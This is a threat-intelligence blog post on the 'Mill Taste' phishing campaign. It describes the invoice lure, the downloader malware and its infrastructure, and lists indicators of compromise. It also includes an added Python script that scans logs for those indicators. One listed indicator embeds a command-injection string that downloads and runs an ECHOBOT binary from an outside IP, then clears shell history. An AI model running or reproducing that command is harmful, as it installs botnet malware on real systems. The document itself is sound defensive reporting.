The “Mill Taste” Campaign

By RJG

October 28, 2019

An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a sweet potato or yam on the landing page of the website.  The social engineering approach is an email from an “Accounting Manager” by the name of “Melissa Henry” who is sending a “copy” of a paid invoice.  The email carries a PDF attachment and arrives with the subject line: Paid Invoice TT Copy. Based on my link analysis, the PDF is infected with malware, which is described below.

Phishing Campaign Cyber Observables

The phishing domain is:  elmolinosabor[.]com

The phishing IP is:  146.112.61[.]107

Recent DNS History

The threat actor appears to have begun building the infrastructure on February 1, 2019, using an admin panel labeled “l5fa7189.justinstalledpanel.com” at IP 94.102.60.165.  From the DNS history tracked by [redacted], it appears that the initial test runs of the malicious infrastructure took place on June 5th and 8th from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.

The splash page for all three of these events shows the same ‘Welcome!’ placeholder.

According to the [redacted] tool, the autonomous system for the above-noted IP is AS202425, which is exhibiting multiple security issues, including:

  • Route leaks (4)
  • Hijacks (111)
  • DDoS Amplifiers (326)
  • Static Loops (5)

Malware Artifacts

The most recently seen malware artifact, as documented on [redacted], was the following Win32 executable:  scaalqtw[.]exe (SHA-256: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9). As of August 15, 2019, 51 of 70 antivirus research firms had identified this file as malicious, including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a “heuristic” “downloader” and as a “Grandcrab.AF” Trojan.

As the viewer can see from the above screenshot, the executable beacons out to a Seychelles site and to a .zz site (shown with a question mark [?] on the node graph). Numerous “communicating” and referring nodes are also associated with the .zz node, which [redacted] identifies as Hanover Hospital.  The Cyber Observables for this campaign are given below.

Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.

Dropper Site Cyber Observables

533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9,
94.102.60.165,
10.0.2.15,
http://94.102.60.165/log/adm.php,
http://94.102.60.165/check.dll,
http://94.102.60.165/mail.dll,
http://94.102.60.165/sun/check.dll,
http://94.102.60.165/sea/indexh.php?&1001=2&99=15&f1=ssleay32.dll,
http://94.102.60.165/sun/indexh.php?&1001=2&99=15&f1=ssleay32.dll,
http://94.102.60.165/sun/indexh.php?&1001=2&99=15&f1=libeay32.dll,
http://10.0.2.15:1041%s/,
http://94.102.60.165/sun/indexh.php?&1001=2&99=0&f1=7z.dll,
http://94.102.60.165/sun/indexh.php?&1001=2,
http://94.102.60.165/sea/indexh.php?&1001=4&req=3&

Communicating Nodes Cyber Observables

12c7e0c472a50b29530a0417659d758079d7cfa9557ea224d95ea92745cb0ac3,
5f4ec26b34a5dcb26590128a6c99b8391f00cb7fcba301a25291b33bf27b65b3,
d691b01806cc91407f560e4a1ee2bad5d817cab98989f7e7353dc8c0e1239c48,
a1510186f29e0c0b5e0c01a986ecb4e16938be0fba3c2f19d81374f4130317cf,
2e14332b9b4c8c1b36dbd6515ac7e5212d0e634792415feeb8eb25134b09ca0d,
adb17860802b2a9e5dd10e603b4034142ee35a00474f7a13b6474f24be880510,
723d9a74f82c1eeae07e4ce8bb2580b8b60673311d04384284809f96e5cb2d6e,
1e12793127168b505dac74e0ba56e268afaf8f9cc819c70e09bd84583a7fdd6f,
cdac6989937bd374e5a4c7e58a91f68c0bb409c1d58034a5c8670144bde6d762,
7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814,
w1-runnerscaleoutcitusgroup637078724425217418.postgres.database.azure.com,
runnercitus-eastus-348e85ea-4.postgres.database.azure.com,
w0-runnerscaleoutcitusgroup637078580419087604.postgres.database.azure.com,
runnercitus-eastus-1be96d43-3.postgres.database.azure.com,
w1-runnerscaleoutcitusgroup637078436412997021.postgres.database.azure.com,
pantos-msk.d4honm.c2.kafka.ap-northeast-2.amazonaws.com,
runnercitus-eastus-d6febfab-2.postgres.database.azure.com,
w1-runnerscaleoutcitusgroup637078292406906669.postgres.database.azure.com,
cfnlaunchpadcanarytes.ydze9e.c4.kafka.eu-north-1.amazonaws.com,
w0-runnerscaleoutcitusgroup637078148400702433.postgres.database.azure.com,
http://10.0.2.15/bot/config.bin,
http://10.0.2.15:1037/click/dtype=stred/pid=12/cid=72435/path=%25s/*,
http://yuemahui.f3322.org/,
http://10.0.2.15/repository/annotate?rev=cd /tmp; wget http://31.13.195.251/ECHO/ECHOBOT.x86; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c,
http://gxga.3322.org/,
http://jjteng.3322.org/,
http://chenyunfei.3322.org/,
https://yuemahui.f3322.org/,
https://populire.servecounterstrike.com/,
http://populire.servecounterstrike.com/,
7d7c9c2deb475c3e7c77f5b9fff03dc6bddced25115232b68112acfead57c2a1,
0439751586a1856bc8feb48535c4055f51835b679e386d083a2c98d47181218f,
b2a9f53b52998f213675a332df13f0e66800277dde678c42c446f18bd6424798,
37269f57bad0f2d954f2aa2892b89bbad10278e84e035b4a4db78f1c6a408d8e,
47a309f76a12f39d77f155f5e548ac10126db993c1f619c6810ca71793f77734,
de9d727e15ea3ddbe9eb3a49ae083e5cca23f9fbf8cdd5d76021e3cea37cb2af,
5d393cdd0d4c8813f9c86121d6279d85232316bbe993ea1fb6f8f4471efb5d8a,
6ab990ea783a1e28783b79d123525d434f93b7214014d0cd8071889f82108562,
dda022507ffdcb2eb82534a3224f0862eb76faaacedc91b3fb1b06fcfc35c10c,
7c99c2bd71448f2bb930772c4acfeb534472817d9e1493059eebea66b493fcb7
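The two observable lists above are printed in the post's comma-terminated, one-per-line form, with some entries defanged as `[.]`. The following is an added example (written for this page, not code from CTIN or the original post) showing how a defender would load such a list into typed indicator sets and sweep DNS, proxy and EDR log lines for hits. It uses only a subset of the indicators printed above, and it deliberately drops private (RFC 1918) addresses such as 10.0.2.15, which is the default NAT address of a sandbox VM rather than attacker infrastructure; the log lines are constructed for the example and do not come from the post.

```python
"""Load Mill Taste observables, classify them, and sweep sample log lines.

Added example, not part of the original post. The observable subset below is
copied from the page; the log lines are constructed for illustration only.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Subset of the observables listed on the page, "[.]" defanging kept as printed.
OBSERVABLES_TEXT = """\
elmolinosabor[.]com,
146.112.61[.]107,
533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9,
94.102.60.165,
10.0.2.15,
http://94.102.60.165/log/adm.php,
http://94.102.60.165/sun/check.dll,
http://10.0.2.15/bot/config.bin,
l5fa7189.justinstalledpanel.com
"""

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)([a-z0-9-]{1,63}\.)+[a-z]{2,}$")


def refang(value: str) -> str:
    """Turn 'elmolinosabor[.]com' back into 'elmolinosabor.com' (and hxxp -> http)."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def classify(value: str) -> str:
    """Return one of 'sha256', 'url', 'ipv4', 'domain' or 'unknown' for a token."""
    if SHA256_RE.match(value):
        return "sha256"
    if value.startswith(("http://", "https://")):
        return "url"
    try:
        ipaddress.IPv4Address(value)
        return "ipv4"
    except ValueError:
        pass
    if DOMAIN_RE.match(value):
        return "domain"
    return "unknown"


def is_private_ip(value: str) -> bool:
    """True for RFC 1918 / loopback style addresses, which are sandbox artifacts here."""
    try:
        return ipaddress.IPv4Address(value).is_private
    except ValueError:
        return False


def load_observables(text: str) -> dict:
    """Parse the comma-terminated list into typed sets, dropping private-IP entries.

    URL entries are also indexed by their host so that a bare DNS or connection
    log line (which never carries the full URL) still matches.
    """
    groups = {"sha256": set(), "ipv4": set(), "domain": set(), "url": set()}
    for raw in text.splitlines():
        value = refang(raw.strip().rstrip(",").strip().lower())
        if not value:
            continue
        kind = classify(value)
        if kind == "url":
            host = urlsplit(value).hostname or ""
            if is_private_ip(host):
                continue  # e.g. http://10.0.2.15/bot/config.bin is sandbox-local
            groups["url"].add(value)
            groups["ipv4" if classify(host) == "ipv4" else "domain"].add(host)
        elif kind == "ipv4":
            if not is_private_ip(value):
                groups["ipv4"].add(value)
        elif kind in groups:
            groups[kind].add(value)
    return groups


def tokens(line: str):
    """Yield candidate values from a log line, unwrapping key=value fields."""
    for tok in line.split():
        tok = tok.strip(",;()\"'").lower()
        if not tok.startswith(("http://", "https://")) and "=" in tok:
            tok = tok.split("=", 1)[1]  # 'query=elmolinosabor.com' -> 'elmolinosabor.com'
        yield tok


def match_line(line: str, groups: dict) -> list:
    """Return (kind, indicator) pairs for every indicator referenced by one log line."""
    hits = []
    for tok in tokens(line):
        kind = classify(tok)
        if kind == "url":
            if tok in groups["url"]:
                hits.append(("url", tok))
            host = urlsplit(tok).hostname or ""
            if host in groups["domain"] or host in groups["ipv4"]:
                hits.append((classify(host), host))
        elif kind in groups and tok in groups[kind]:
            hits.append((kind, tok))
    return hits


def scan(lines: list, groups: dict) -> list:
    """Return [(line_index, hits)] for each log line that touches an indicator."""
    return [(i, match_line(l, groups)) for i, l in enumerate(lines) if match_line(l, groups)]


# Constructed sample log lines (not from the post): DNS, proxy, EDR, and one benign line.
SAMPLE_LOGS = [
    "2019-10-28T09:12:01Z dns client=192.168.5.20 query=elmolinosabor.com type=A",
    "2019-10-28T09:12:03Z proxy client=192.168.5.20 GET http://94.102.60.165/sun/check.dll 200",
    "2019-10-28T09:15:44Z edr host=WS-017 sha256=533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9 action=created",
    "2019-10-28T09:16:10Z proxy client=192.168.5.21 GET https://www.example.org/ 200",
]

if __name__ == "__main__":
    indicators = load_observables(OBSERVABLES_TEXT)
    for idx, found in scan(SAMPLE_LOGS, indicators):
        print(f"line {idx}: {found}")
```

Indexing URL observables by host is what makes the DNS line match: a resolver log only sees `elmolinosabor.com`, never the full request path, so a URL-only watchlist would miss the first contact. The same loader can be pointed at the full lists above once the `[redacted]` tool export is available.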

RJG, CTIN President & Co-Founder

Jane Ginn. As the co-founder of the Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. She currently serves as the Secretary of the OASIS Threat Actor Context Technical Committee, contributing to the creation of a semantic technology ontology for cyber threat actor analysis. Her efforts in this area and her earlier work with the Cyber Threat Intelligence (CTI) TC earned her the 2020 Distinguished Contributor award from OASIS. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights. Follow me on LinkedIn: www.linkedin.com/comm/mynetwork/discovery-see-all?usecase=PEOPLE_FOLLOWS&followMember=janeginn